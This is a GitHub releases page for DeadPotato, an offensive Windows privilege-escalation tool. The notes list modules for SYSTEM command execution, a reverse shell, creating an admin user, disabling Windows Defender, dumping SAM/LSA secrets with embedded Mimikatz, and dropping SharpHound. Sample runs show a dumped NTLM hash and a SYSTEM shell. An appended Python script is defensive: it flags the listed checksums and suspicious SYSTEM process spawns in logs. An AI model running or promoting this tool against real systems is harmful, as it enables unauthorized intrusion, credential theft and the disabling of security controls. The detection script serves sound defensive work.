Releases: lypd0/DeadPotato

Version 1.2

04 Aug 17:01

DeadPotato - Version 1.2

This version includes the following changes:

  • sharphound: Attempts to collect domain data for BloodHound. (NOTE: This will write SharpHound to disk!)
  • mimi <sam/lsa/secrets>: Added LSA & Secrets dump with Mimikatz.
  • Added banner compatibility for win10.

Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility for the misuse of DeadPotato or any of its components.

Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -sharphound module!

C:\Users\lypd0> DeadPotato.exe -sharphound
      _.--,_
   .-'      '-.          _           _ 
  /            \        | \ _  _  _||_) _ _|_ _ _|_ _ 
 '          _.  '       |_/(/_(_|(_||  (_) |_(_| |_(_)
 \      """" /  ~(      Open Source @ github.com/lypd0
  '=,,_ =\__ `  &             -= Version: 1.2 =-
        ""  ""'; \\\ 


_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

(*) Attempting to write XaOAZsTO.exe (SharpHound) in the current directory...
(+) File written. Attempting to run enumeration...

(*) Initiating procedure as NT AUTHORITY\NETWORK SERVICE
(+) Is impersonation possible in current context? YES
(+) Currently running as user: NT AUTHORITY\SYSTEM
(+) Elevated process started with PID 3640

-={          OUTPUT BELOW         }=-

<..SNIP..>
2024-08-04T08:08:05.4023630-07:00|INFORMATION|SharpHound Enumeration Completed at 8:08 AM on 8/4/2024! Happy Graphing!

(+) Removing SharpHound and exiting.

Binary                     MD5 Checksum
DeadPotato-NET4.exe        C76954078004EDD81B1836A09F9D0D66
mimikatz.exe (embedded)    E930B05EFE23891D19BC354A4209BE3E
[SharpHound.exe]           AAF1146EC9C633C4C3FBE8091F1596D8

Version 1.1

01 Aug 21:07

DeadPotato - Version 1.1

This version includes the following functions:

  • mimisam: Attempts to dump the SAM database with Mimikatz. (NOTE: This will write mimikatz to disk!)
  • defender: Either enables or disables Windows Defender's real-time protection.

Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility for the misuse of DeadPotato or any of its components.

Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -mimisam module!

PS C:\Users\john> .\DeadPotato -mimisam
    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   | \ _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.1 =-
    ⠀⠀⠀⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

(*) Attempting to write vs1wGHKx.exe (mimikatz) in the current directory...
(+) File written. Attempting to dump SAM...

(*) Initiating procedure as NT AUTHORITY\NETWORK SERVICE
(+) Is impersonation possible in current context? YES
(+) Currently running as user: NT AUTHORITY\SYSTEM
(+) Elevated process started with PID 10436

-={          OUTPUT BELOW         }=-


  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::sam
<..SNIP..>
User : john
  Hash NTLM: ce17d7c3576091dfda645a92ca1b53c3

Binary                     MD5 Checksum
DeadPotato-NET4.exe        3E44D727CF75C841DC502EE2733491A6
mimikatz.exe (embedded)    E930B05EFE23891D19BC354A4209BE3E

Version b1.0

31 Jul 09:29

DeadPotato - Version b1.0

This is the first released version of DeadPotato, a customized version of GodPotato by BeichenDream.
This version includes the following functions:

  • cmd: Execute a command as NT AUTHORITY\SYSTEM.
  • rev: Attempts to establish a reverse shell connection to the provided host.
  • exe: Execute a program with NT AUTHORITY\SYSTEM privileges.
  • newadmin: Create a new administrator user on the local system.
  • shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)

This is a privilege escalation utility that abuses the SeImpersonatePrivilege rights assigned to the current context, allowing the user to achieve NT AUTHORITY\SYSTEM level access seamlessly.

Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility for the misuse of DeadPotato or any of its components.

Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -shell module!

PS C:\Users\john> .\DeadPotato -shell

    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   | \ _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version b1.0 =-
    ⠀⠀⠀⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_


Interactive mode enabled, write "quit" to exit.
* DeadPotato * C:\Users\john> whoami
nt authority\system

* DeadPotato * C:\Users\john> cd ..

* DeadPotato * C:\Users> dir
 Volume in drive C is OS                                                                                                 
 Volume Serial Number is D34D-PTT0
 Directory of C:\Users                                                                                                               
03/02/2024  19:36    <DIR>          .                                                                                   
23/05/2024  12:46    <DIR>          Public                                                                              
31/07/2024  03:08    <DIR>          john                                                                               

0 File(s)             
0 bytes
3 Dir(s)  999,999,999,999 bytes free 

Binary                     MD5 Checksum
DeadPotato-NET4.exe        2D943071108A5AB2DDE93FDCEF5E00F8
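
For defenders, the artifacts visible in these release notes (the published MD5 checksums, the 8-character random .exe written to the current directory, and a process that ends up running as NT AUTHORITY\SYSTEM) can be turned into a triage check over process-creation logs. The following is an added example, not code from the DeadPotato project; it assumes Sysmon Event ID 1 style field names (Image, User, ParentUser, Hashes), assumes the elevated process is logged as a child of the unelevated one, and uses constructed sample events with a made-up LAB\john account.

```python
import re

# MD5 values copied from the release checksum tables on this page.
PAGE_MD5 = {
    "C76954078004EDD81B1836A09F9D0D66": "DeadPotato-NET4.exe 1.2",
    "3E44D727CF75C841DC502EE2733491A6": "DeadPotato-NET4.exe 1.1",
    "2D943071108A5AB2DDE93FDCEF5E00F8": "DeadPotato-NET4.exe b1.0",
    "E930B05EFE23891D19BC354A4209BE3E": "mimikatz.exe (embedded)",
    "AAF1146EC9C633C4C3FBE8091F1596D8": "SharpHound.exe",
}
SYSTEM = "NT AUTHORITY\\SYSTEM"
# The helpers dropped in the page's output are named <8 alphanumerics>.exe.
RANDOM_EXE = re.compile(r"\\[A-Za-z0-9]{8}\.exe$")

def md5_of(event):
    """Extract the MD5 from a Sysmon-style 'MD5=...,SHA256=...' Hashes field."""
    for part in event.get("Hashes", "").split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "MD5":
            return value.strip().upper()
    return None

def triage(event):
    """Return the reasons a process-creation event deserves analyst review."""
    reasons = []
    label = PAGE_MD5.get(md5_of(event))
    if label:
        reasons.append(f"md5 matches {label}")
    user, parent = event.get("User", ""), event.get("ParentUser", "")
    # Assumption: the elevated process is logged as a child of the unelevated one.
    if user.upper() == SYSTEM and parent and parent.upper() != SYSTEM:
        reasons.append(f"SYSTEM child of non-SYSTEM parent ({parent})")
        if RANDOM_EXE.search(event.get("Image", "")):
            reasons.append("random 8-character .exe name")
    return reasons

# Constructed sample events (field names follow Sysmon Event ID 1; not real telemetry).
EVENTS = [
    {"Image": r"C:\Users\john\vs1wGHKx.exe", "User": SYSTEM,
     "ParentUser": r"LAB\john", "Hashes": "MD5=E930B05EFE23891D19BC354A4209BE3E"},
    {"Image": r"C:\Windows\System32\svchost.exe", "User": SYSTEM,
     "ParentUser": SYSTEM, "Hashes": "MD5=0123456789ABCDEF0123456789ABCDEF"},
    {"Image": r"C:\Users\john\notepad2.exe", "User": r"LAB\john",
     "ParentUser": r"LAB\john", "Hashes": "SHA256=00"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["Image"], "->", triage(ev) or "no findings")
```

The checksum match only identifies the exact release binaries listed above and is lost on any rebuild, so the user-transition check is the part that carries over to modified copies.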